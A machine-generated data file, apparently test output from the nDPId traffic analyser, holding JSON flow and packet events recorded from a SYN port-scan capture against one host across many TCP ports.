-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAskKIAACUGktCsEAAIQA2GNIzTACvdU4MZAAAAAGACCAAwYQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsFzgAADYG+zqsEAAIQA2GNIzTBrXdU4MZAAAAAGACDAAl1wAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060437,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_packet_id":1,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060437,"pkt":"ACYLMQczACWzv5HuCABFAAAsDqUAADQGBc6sEAAIQA2GNIzTFLLdU4MZAAAAAGACBAAf2gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsEZkAADsG+9msEAAIQA2GNIzToifdU4MZAAAAAGACEACGZAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsyMwAADsGRKasEAAIQA2GNIzTH5jdU4MZAAAAAGACEAAI9AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsGE4AADUG+ySsEAAIQA2GNIzTF3PdU4MZAAAAAGACCAAZGQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsBbYAADAGEr2sEAAIQA2GNIzTJyjdU4MZAAAAAGACBAANZAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs6H4AACYGOfSsEAAIQA2GNIzTBGHdU4MZAAAAAGACDAAoKwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdMIAACoGqbCsEAAIQA2GNIzTIsPdU4MZAAAAAGACDAAJyQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsV8wAACUGy6asEAAIQA2GNIzTBPjdU4MZAAAAAGACCAArlAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdhoAADUGnVisEAAIQA2GNIzSCIPdUoMYAAAAAGACCAAoDAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs9nIAACcGKwCsEAAIQA2GNIzSE9\/dUoMYAAAAAGACEAAUsAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsjegAADcGg4qsEAAIQA2GNIzSrZrdUoMYAAAAAGACEAB69AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsNycAADcG2kusEAAIQA2GNIzSAavdUoMYAAAAAGACEAAm5AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjgAACsGpzqsEAAIQA2GNIzSD6TdUoMYAAAAAGACEAAY6wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs334AACgGQPSsEAAIQA2GNIzSCVrdUoMYAAAAAGACBAArNQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdPQAADkGmn6sEAAIQA2GNIzSF0DdUoMYAAAAAGACCAAZTwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsZEIAADgGrDCsEAAIQA2GNIzSCjDdUoMYAAAAAGACBAAqXwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsnDoAADUGdzisEAAIQA2GNIzSAcrdUoMYAAAAAGACCAAuxQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAs3AsAADkGM2esEAAIQA2GNIzSBCzdUoMYAAAAAGACCAAsYwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsqx8AACoGc1OsEAAIQA2GNIzSBqTdUoMYAAAAAGACDAAl6wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsIRsAACkG\/lesEAAIQA2GNIzSArPdUoMYAAAAAGACCAAt3AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsTGQAACcG1Q6sEAAIQA2GNIzSFxbdUoMYAAAAAGACEAAReQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsspgAACoGa9qsEAAIQA2GNIzSI4\/dUoMYAAAAAGACDAAJAAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
